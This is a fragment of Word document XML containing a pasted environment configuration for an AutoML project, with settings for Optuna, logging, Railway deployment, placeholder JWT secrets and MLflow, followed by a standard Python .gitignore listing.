    <w:p w14:paraId="668AD765" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="777635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0CE3DA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AUTOML SPECIFIC CONFIGURATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C503B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4D07C14B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D8F36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Ambiente de execução (development/production)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2FBD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SUNA_ENV=production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547CC06E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50EF16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Número de trials Optuna (15 prod / 30 dev)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4F49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OPTUNA_TRIALS=15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB83831" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="795083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Timeout para otimização (em segundos)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D734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AUTOML_TIMEOUT=180</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B099B88" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AA0BB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Algoritmo de otimização (TPE, Random, CmaEs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433F30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AUTOML_SAMPLER=TPE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A214976" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A0C2F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608430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LOGGING CONFIGURATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3B13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5772E361" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D89E6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Nível de log (DEBUG, INFO, WARNING, ERROR, CRITICAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5D2D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LOG_LEVEL=INFO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A6346E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E361F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Formato de log (json/text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D690C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LOG_FORMAT=text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4208EC11" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B550D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38FEA8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RAILWAY DEPLOYMENT CONFIGURATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8187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30396EEF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26618A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Porta para o servidor (Railway define automaticamente)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0704D1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PORT=8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF7F0EE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E2D2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Ambiente de execução</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B22B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ENVIRONMENT=production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3CA845" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68102A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4F4786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SECURITY CONFIGURATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F6BF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6620B202" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F59F2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Chave secreta para JWT (gere uma aleatória)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C1E1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SECRET_KEY=sua-chave-secreta-muito-longa-e-aleatoria</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EFF9DE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="615172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Salt para hashing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB18C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SECURITY_SALT=seu-salt-aleatorio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1261B495" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49597C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09170D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MLFLOW CONFIGURATION (OPTIONAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54639B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0C4E7C44" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A0204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MLflow tracking URI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6483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MLFLOW_TRACKING_URI=file:./mlruns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D281DE7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="071032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Habilitar MLflow (true/false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136E8E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MLFLOW_ENABLED=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1357E678" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E313F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326DE8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VALORES RECOMENDADOS PARA PRODUÇÃO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7581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600364A8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D3960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Para produção, use estes valores:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D34A5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SUNA_ALSHAM_AUTO_START=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AF24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SUNA_ALSHAM_EVOLUTION_INTERVAL=60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652668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SUNA_ALSHAM_DEBUG=false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9579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LOG_LEVEL=INFO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5230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SUNA_ENV=production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1CA3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OPTUNA_TRIALS=15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F5C25F" w14:textId="3937CB8A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# AUTOML_TIMEOUT=180</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00546FF2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C2F1496" w14:textId="1C3505B7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.gitignore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D23685" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># Byte-compiled / optimized / DLL files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8273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__pycache__/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568A07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*.py[codz]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085643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*$py.class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705EFDA9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07362F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 extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CB61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*.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4974FCE6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2816D9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Distribution / packaging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9744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.Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392FC8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build/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7923EB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develop-eggs/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720394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dist/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6474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downloads/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE28E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eggs/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147DF7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.eggs/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F96AE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lib/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ABD3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lib64/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EE9A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parts/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309E3B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sdist/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415393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var/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4EE8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wheels/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742EBD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share/python-wheels/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402F64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*.egg-info/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753BB7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.installed.cfg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFBF3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*.egg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BF50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MANIFEST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3082B107" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20CE38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PyInstaller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224E00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Usually these files are written by a python script from a template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2562B7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before PyInstaller builds the exe, so as to inject date/other infos into it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5732D9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*.manifest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CE87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*.spec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122A38BF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78CFB6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Installer logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A0DD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pip-log.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5F38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pip-delete-this-directory.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F8B9F5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6902A4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Unit test / coverage reports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256ABA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htmlcov/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8DE0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.tox/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE01E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.nox/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FA85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.coverage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDF2D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.coverage.*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EBF5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.cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2F36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nosetests.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514367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coverage.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EBCA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*.cover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC96A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*.py.cover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63015C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.hypothesis/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463368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.pytest_cache/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3B1F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cover/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2022372C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BAB4E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Translations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EE80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*.mo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CC3F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*.pot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB95199" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F7C53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Django stuff:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9CCF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*.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCCDA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local_settings.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D579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db.sqlite3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A851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db.sqlite3-journal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5247F1E6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D17EC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Flask stuff:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E0A1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instance/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A6BC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.webassets-cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C92524D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="746C31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Scrapy stuff:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B8EF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.scrapy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CE2DAF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ABB7A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Sphinx documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156897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docs/_build/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68792CE3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BBBF1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PyBuilder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4419AC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.pybuilder/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2807DE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target/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51025C90" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62A5D3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Jupyter Notebook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA387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.ipynb_checkpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A028AA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4544D3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IPython</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C72DC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profile_default/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7740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ipython_config.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FE37C4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DAE29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pyenv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7FCD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For a library or package, you might want to ignore these files since the code is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0109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intended to run in multiple environments; otherwise, check them in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DE4B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.python-version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78084876" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D0C3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pipenv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DB01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According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DC8D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However, in case of collaboration, if having platform-specific dependencies or dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1B72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having no cross-platform support, pipenv may install dependencies that don't work, or not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0F14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install all needed dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8BEB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#Pipfile.lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC81A57" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA775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UV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C45B1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Similar to Pipfile.lock, it is generally recommended to include uv.lock in version control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B2C5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This is especially recommended for binary packages to ensure reproducibility, and is more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D417C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commonly ignored for libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5455CB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#uv.lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7D34E9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3063CB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poetry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F81D2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Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32744C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This is especially recommended for binary packages to ensure reproducibility, and is more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B788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commonly ignored for libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460201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https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FC8F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#poetry.lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551EEA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#poetry.toml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1EE5B7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="225F6D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pdm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FE87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Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C936A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pdm recommends including project-wide configuration in pdm.toml, but excluding .pdm-python.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6436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https://pdm-project.org/en/latest/usage/project/#working-with-version-control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057A30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#pdm.lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B91EC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#pdm.toml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683D7B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.pdm-python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B122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.pdm-build/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B743313" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73D83E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pixi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DE37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Similar to Pipfile.lock, it is generally recommended to include pixi.lock in version control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0ACE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#pixi.lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529838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Pixi creates a virtual environment in the .pixi directory, just like venv module creates one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CB0D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 in the .venv directory. It is recommended not to include this directory in version control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDEE5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.pixi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E246929" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15E30D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PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42919A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__pypackages__/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F3CBA0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D7B2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Celery stuff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEDC8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celerybeat-schedule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3943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celerybeat.pid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E19831" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="039888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SageMath parsed files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB6F5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*.sage.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE593B4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08602F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Environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFD4E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.env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAF9C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.envrc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080F18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.venv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4637F3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env/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B76ED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venv/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7CE1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ENV/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDE08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env.bak/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EB54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venv.bak/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54062935" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B67C6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Spyder project settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272E34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.spyderproject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3291F7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.spyproject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CB2817" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20CDBF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Rope project settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1038F7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.ropeproject</w:t>
      </w:r>
    </w:p>
